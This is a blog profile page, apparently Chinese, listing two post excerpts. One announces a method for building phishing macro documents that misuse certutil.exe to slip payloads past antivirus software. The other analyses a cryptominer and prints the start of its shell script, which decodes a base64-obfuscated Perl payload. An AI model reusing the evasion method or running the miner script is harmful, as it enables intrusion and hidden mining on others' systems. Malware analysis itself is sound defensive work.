- 博客(2)
- 收藏
- 关注
RSS订阅原创 一种“白技术”利用绕过杀软执行payload
曾经在学校接触过APT攻击,抱着对其心技术的兴趣。闲来无事,自己也尝试着利用“白利用”技术构造钓鱼文档执行payload,侥幸的是也成功绕过瑞星、火绒等杀毒软件。 在本文中,我将向大家介绍一种APT常用的攻击手法,通过构造恶意的宏文档执行payload。 本次构造的payload所使用的一款白程序是certutil.exe。该程序是一个Windows系统的内置程序,用于管理Windows中的证书。...
2019-09-16 16:17:25
1594
原创 Perl代码混淆解决
第一个博客,如果写的烂请多担待。 前段时间在单位的测试网中发现一个矿机,拿出来分析,分析定时任务脚本就发现一个很棘手的问题,bash中调用了一个base64加密的perl脚本。 #!/bin/sh nohup ./stop>>/dev/null & sleep 5 echo "ZXZhbCB1bnBhY2sgdT0+cXtfIkZVWSgiMVA8Rl1DOTctUzt...
2019-08-23 09:56:44
29656
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人